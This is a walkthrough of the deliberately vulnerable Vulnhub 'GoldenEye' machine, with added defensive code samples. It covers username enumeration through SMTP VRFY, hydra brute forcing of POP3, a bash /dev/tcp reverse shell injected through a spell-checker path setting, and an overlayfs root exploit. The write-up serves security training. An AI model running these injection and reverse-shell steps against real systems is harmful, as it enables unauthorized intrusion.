Vulnhub is such a great resource for vulnerable virtual machines. Sometimes it can be hit or miss with the realism. At times it’s even laughable that the creator thought you’d find a certain flag.
I’m so happy to say that the person who created the GoldenEye box (@_creosote) did not disappoint. If you’re a fan of the original 90s James Bond flick GoldenEye, then this machine is going to be a nostalgia bomb as well as a fun challenge.
Defining the Attack Surface
nmap 192.168.56.101 -sC -sV -p- -oN full_nmap_scan
We start with a full port scan (-p-), the default script scan (-sC), and version detection (-sV). This reveals a few running services.
It looks like the SMTP server has some commands that it’ll accept. We might use that to brute force some usernames. I like to find the low-hanging fruit first though, so I start with the web server.
Okay, sweet initial landing page. Let’s follow the navigation instructions.
Looks like we found a login. No creds yet though.
A good rule of thumb is to always look at the source of these pages. You never know what’s hiding in them.
Case in point: if you look at terminal.js, which is linked from the homepage, you find some custom JS that was written to drive that sweet landing page.
If you read the comments, it says
Boris, make sure you update your default password. My sources say MI6 maybe planning to infiltrate. Be on the lookout for any suspicious network traffic... I encoded you p@ssword below ...
When I use Burp Decoder to decode that password we get the password
From this we can probably safely assume the username is
So I go back to the login page and try out the creds
Interesting, it looks like they’re pointing us at the POP3 server next.
Finding Credentials and Users
Something fun I think might work on this server is brute forcing the users. I’m not sure if this was cheating or not, but I used a tool called cewl to generate a massive wordlist. It’s great for brute forcing things that you believe are contextual. Since this box is all about the movie GoldenEye, I decided to run cewl over the GoldenEye script to create a wordlist that’s contextual to the movie lol
The way we’re going to brute force the users is by abusing the SMTP server that’s running. By inspecting our nmap output we can see that this server allows you to run the VRFY command, which can be used to brute force usernames out of the system.
You can also do this attack by hand, but it takes a little longer. We’ll see an example of this later on, but for now we’re going to use the tool smtp-user-enum and give it our wordlist as well as our target.
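The defender’s side of the same VRFY enumeration, as an added example that is not part of the original post: a small detector run over constructed mail-server log lines (the one-line-per-command log format is made up for the example) that flags a client issuing many VRFYs in a short window and lists which names the server confirmed.

```python
"""Flag SMTP VRFY bursts (username enumeration) in mail-server logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<ISO time> <client ip> VRFY <name> <reply code>".
# 250 = user exists, 550 = no such user. The format is made up for this example.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 192.168.56.1 VRFY boris 250
2024-05-01T10:00:01Z 192.168.56.1 VRFY bond 550
2024-05-01T10:00:02Z 192.168.56.1 VRFY trevelyan 550
2024-05-01T10:00:02Z 192.168.56.1 VRFY natalya 250
2024-05-01T10:00:03Z 192.168.56.1 VRFY xenia 550
2024-05-01T10:00:03Z 192.168.56.1 VRFY doak 250
2024-05-01T10:09:00Z 10.0.0.7 VRFY postmaster 250
"""

def parse_line(line):
    ts, ip, cmd, name, code = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, cmd, name, int(code)

def vrfy_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"attempts": n, "confirmed": [...]}} for every client that
    issued at least `threshold` VRFYs inside any `window`-long span."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        ts, ip, cmd, name, code = parse_line(line)
        if cmd == "VRFY":
            per_ip[ip].append((ts, name, code))
    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):          # sliding window over sorted times
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # names the server answered 250 for: what the enumeration actually leaked
            confirmed = sorted({n for _, n, c in events if c == 250})
            alerts[ip] = {"attempts": best, "confirmed": confirmed}
    return alerts
```

Postfix can remove the oracle entirely with disable_vrfy_command = yes; the detector is for servers that must keep VRFY enabled.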
Sure enough we end up finding two users
NATALYA. We know Boris is valid for user login on the webpage, but now it appears it’s also a unix user.
You can use netcat to log into POP3 servers.
First I tried logging into the POP3 server with the user credentials we know, boris:InvincibleHack3r, but they don’t seem to work. So it looks like the user credentials must be different. Thankfully we can use hydra to try and brute force the POP3 server.
Using Hydra we were able to not only brute force the credentials boris:secret1! but also
Let’s try and log into the POP3 server again
Sure enough we get in!
I had to look up some documentation to understand the commands I needed to use here to retrieve emails, but essentially here they are:
USER <username> <~ Sets the username
PASS <password> <~ Sets the password
STAT <~ Tells you how many messages are available
LIST <~ Tells you the message id and I believe the length
RETR <ID> <~ Retrieves the message and displays it in the console
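The exchange those commands produce, as an added example that is not the post’s own session: the client side of USER/PASS/STAT/LIST/RETR written against a constructed scripted server, so the multi-line termination and dot-unstuffing that LIST and RETR rely on can be seen offline.

```python
"""POP3 USER/PASS/STAT/LIST/RETR client logic against a scripted server (offline)."""

class ScriptedServer:           # constructed stand-in: replies come from a fixed list
    def __init__(self, replies):
        self.replies, self.sent = list(replies), []
    def send(self, line):
        self.sent.append(line)
    def readline(self):
        return self.replies.pop(0)

def expect_ok(srv):
    """Every reply starts with +OK or -ERR; treat anything but +OK as fatal."""
    reply = srv.readline()
    if not reply.startswith("+OK"):
        raise RuntimeError(f"server refused: {reply}")
    return reply

def read_multiline(srv):
    """LIST and RETR bodies end with a lone '.'; a leading '..' unstuffs to '.'."""
    lines = []
    while (line := srv.readline()) != ".":
        lines.append(line[1:] if line.startswith("..") else line)
    return lines

def fetch_mailbox(srv, user, password):
    """Log in and return {message id: body lines}, the session from the post."""
    expect_ok(srv)                                  # greeting banner
    srv.send(f"USER {user}"); expect_ok(srv)
    srv.send(f"PASS {password}"); expect_ok(srv)    # clear text: no TLS on port 110
    srv.send("STAT")
    count = int(expect_ok(srv).split()[1])          # "+OK <count> <octets>"
    srv.send("LIST"); expect_ok(srv)
    ids = [int(entry.split()[0]) for entry in read_multiline(srv)]
    if len(ids) != count:
        raise RuntimeError("STAT and LIST disagree")
    messages = {}
    for mid in ids:
        srv.send(f"RETR {mid}"); expect_ok(srv)     # RETR, not RERT
        messages[mid] = read_multiline(srv)
    return messages

SCRIPT = [                                          # constructed two-message mailbox
    "+OK POP3 server ready", "+OK", "+OK Logged in.", "+OK 2 310",
    "+OK 2 messages:", "1 120", "2 190", ".",
    "+OK 120 octets", "From: root", "", "Hello Boris", ".",
    "+OK 190 octets", "From: natalya", "", "..a body line that starts with a dot", ".",
]

def demo():
    srv = ScriptedServer(SCRIPT)
    return fetch_mailbox(srv, "boris", "secret1!"), srv.sent
```

The PASS line is the reason hydra works here: the password crosses the wire unencrypted, so the same plain-text channel serves both the brute force and the capture.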
Here’s the other two emails I retrieved
Okay not a ton that’s useful there other than some great movie references
Let’s look at Natalya’s emails
The first email doesn’t have much in it that’s helpful, but it does help us understand that she has GNO privileges for some system when students are assigned.
Ahhhh here we go, some new creds and a link. It looks like there’s a hostname we need to add to our
After we save that file, we can navigate to that URL.
Let’s try logging in with Xenia’s credentials
After navigating through the site a little, I came across this file upload and got stuck here _FOR A WHILE_
Pretty sure this is not the spot for access lol
A little more digging and I found this email from Dr Doak:
My email username is doak
Well that can’t get much more clear lol
Just to be thorough though, let’s try and use the same SMTP VRFY function
It does appear that doak is a user on the system. Let’s see if we can brute force his credentials too with Hydra, like we did for Natalya and Boris.
SWEET! We got another set of creds
doak:goat. The GOAT, rightfully so.
(Fun fact: Research who Doak is in the movie as well as who he is in real life)
Finding Admin Credentials
Alright, now we can log back into the mail server and see if Doak has anything juicy in his inbox
Okay, it looks like Dr Doak is speaking directly to us now and giving us his credentials to get into his account on the training site. If he’s the admin, we may be able to do more than just read posts.
We’re in! And we have a flag 🙂 Though it doesn’t appear Doak is an admin 🙁
Ohhh interesting, so we’re one step away from admin creds I guess.
Let’s check out that image
So I was hoping for a little more of a challenge here. The first thing I did with this image was try to run binwalk over it. I guess I was expecting some nested files. That didn’t turn anything up though. Next I ran strings over it
Looks like there’s some message in the EXIF data, so we can also run the exif tool over the image to retrieve it.
It appears that in the image description there’s a base64 encoded string. When we decode this string in Burp Decoder we get
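The same recovery as an added example, not the post’s own commands: it builds a constructed JPEG whose EXIF ImageDescription holds a base64 string (SECRET stands in for the real password) and parses the APP1 segment back out, which is all the exif tool is doing here. Base64 is encoding, not protection, so anyone who can fetch the image can read the value.

```python
"""Build a minimal JPEG whose EXIF ImageDescription carries base64 text, then
parse it back the way strings/exiftool would reveal it. Added example."""
import base64
import struct

SECRET = "constructed-password"                      # stand-in for the real value
ENCODED = base64.b64encode(SECRET.encode()).decode()

def build_jpeg_with_description(text):
    """Constructed image: SOI, one APP1/Exif segment with a single IFD0 entry, EOI."""
    value = text.encode() + b"\x00"
    tiff = b"II*\x00" + struct.pack("<I", 8)          # little-endian, IFD0 at offset 8
    ifd = struct.pack("<H", 1)                         # one entry
    ifd += struct.pack("<HHII", 0x010E, 2, len(value), 8 + 2 + 12 + 4)  # ASCII, value after IFD
    ifd += struct.pack("<I", 0)                        # no next IFD
    payload = b"Exif\x00\x00" + tiff + ifd + value
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload + b"\xff\xd9"

def exif_image_description(jpeg):
    """Walk the JPEG segments and return tag 0x010E (ImageDescription) or None."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                     # EOI / start of scan: no more metadata
            break
        seglen = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and body.startswith(b"Exif\x00\x00"):
            tiff = body[6:]
            e = "<" if tiff[:2] == b"II" else ">"
            ifd0 = struct.unpack(e + "I", tiff[4:8])[0]
            count = struct.unpack(e + "H", tiff[ifd0:ifd0 + 2])[0]
            for i in range(count):
                entry = tiff[ifd0 + 2 + 12 * i:ifd0 + 14 + 12 * i]
                tag, typ, n, off = struct.unpack(e + "HHII", entry)
                if tag == 0x010E and typ == 2:        # ASCII value, inline if <= 4 bytes
                    raw = entry[8:12] if n <= 4 else tiff[off:off + n]
                    return raw.rstrip(b"\x00").decode("ascii", "replace")
        pos += 2 + seglen
    return None

def recover_secret(jpeg):
    """Base64 is encoding, not protection: anyone with the file gets the value."""
    return base64.b64decode(exif_image_description(jpeg)).decode()

SAMPLE = build_jpeg_with_description(ENCODED)
```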
Now that we have what I believe is the admin password for the training site, let’s try logging out of the site, and logging back in with
Getting a Shell
I’ll admit that it took me a little bit to get this shell to work. I found the vulnerability immediately after logging in but for some reason it didn’t work for me.
As you make your way through the admin settings this input pops up under System Paths and it’s extraordinarily tempting looking. It’s clearly running some bash command. Sooooo, why not put our own bash command in? 🙂
Pulling from my favorite FAVORITE resource, the Reverse Shell Cheat Sheet by PentestMonkey,
I enter into that highlighted field the command /bin/bash -i >& /dev/tcp/192.168.158.1/443 0>&1
Then on my attacking machine I run nc -lvp 443, which opens a listener on port 443.
This is where I got hung up. The way I believe this was supposed to work was: put in your command, then go to make a post. When you make a post, run the spell check on your post and it should run this command. What actually happened was nothing for me haha
I ended up getting it to work by going into the settings and toggling the spell checker service. Once again, I’m not sure if this was an intentional step or not.
Once you do this, you go back to the blog post and once again attempt to run the spell checker. If you do this, your reverse shell command will execute.
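Why that field is dangerous, as an added example that is not the training site’s code: a configurable tool path spliced into a shell string, beside a hardened version that validates the setting against an allow-list and runs the tool as an argv list with no shell. The allow-listed names and directories are assumptions for the example.

```python
"""The 'System Paths' setting feeds a spell-checker binary path into a shell
command. Vulnerable string-splicing beside a hardened argv-based version."""
import os
import re
import subprocess
from pathlib import Path

# Allow only an absolute path made of plain path characters: no ';', '|', '$', spaces.
SAFE_PATH = re.compile(r"^/[A-Za-z0-9_./-]+$")

def build_spellcheck_command_vulnerable(tool_path, text_file):
    """The bug's shape: the admin-editable setting is spliced into one shell string,
    so a value like '/usr/bin/aspell; <command>' runs <command> as the web user."""
    return f"cat {text_file} | {tool_path} list"      # meant for os.system()/shell=True

def validate_tool_path(tool_path, allowed_names=("aspell", "hunspell"),
                       allowed_dirs=("/usr/bin", "/usr/local/bin", "/bin")):
    """Accept only a metacharacter-free absolute path to a known tool in a known dir."""
    if not SAFE_PATH.match(tool_path) or ".." in Path(tool_path).parts:
        raise ValueError(f"rejected tool path: {tool_path!r}")
    p = Path(tool_path)
    if str(p.parent) not in allowed_dirs or p.name not in allowed_names:
        raise ValueError(f"tool not on the allow-list: {tool_path!r}")
    return p

def is_safe_tool_path(tool_path, **kw):
    try:
        validate_tool_path(tool_path, **kw)
        return True
    except ValueError:
        return False

def run_spellcheck(tool_path, text, **kw):
    """Hardened: validated path, argv list (no shell), text on stdin, words as a list."""
    tool = validate_tool_path(tool_path, **kw)
    if not (tool.is_file() and os.access(tool, os.X_OK)):
        raise FileNotFoundError(f"{tool} is not an executable file")
    result = subprocess.run([str(tool), "list"], input=text, capture_output=True,
                            text=True, check=True)
    return result.stdout.split()
```

Even with the argv form, the setting should only be editable by a trusted admin role and changes to it logged, since a legitimate tool path still decides which binary runs.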
Getting a Root Shell
I waste no time when I’m trying to elevate privileges. I pull down the script linenum.sh, which you can find (and more) over on my favorite resources page.
This had a ton of great info but ultimately it didn’t lead me to the root priv esc
To find that, I had to run the Linux Privilege Escalation Auditing Tool, which you can find here: linux-exploit-suggester.sh
Once you run this tool you’ll see that the machine is vulnerable to something called an overlayfs attack. This exploit can be found already installed on your attacking machine if you have Exploit-DB installed.
You just need to run
To which you will find a few candidates
Now, if you do what I did, you’ll get this C file over to the target machine and attempt to compile it with gcc…. then you’ll realize there is no gcc.
After some digging I came across something installed though called cc, which is the C compiler on the machine.
So, naturally I compiled it and attempted to run it…. Then it blew up and complained about gcc again.
You’ll need to open this file up on your attacking machine and modify some of the code
As you can see here, inside the code, it’s attempting to compile something with gcc. Which, of course now we know doesn’t exist on the machine. Just give it `cc` instead and you’ll be good to go.
Send that sucker back to your target machine again, recompile it and run it
AND WE ARE ROOT!
I can’t overstate how much fun this machine was considering how big of a part GoldenEye played in my childhood. Every inch of this machine was crawling with nostalgic references. I loved every bit of it. Also, there wasn’t anything too crazy on here. For the most part the exploits were poor configurations and bad password management, which we know happens in the real world.
In closing, if you’re a GoldenEye fanboi or fangirl, go check this box out. It’s a great time.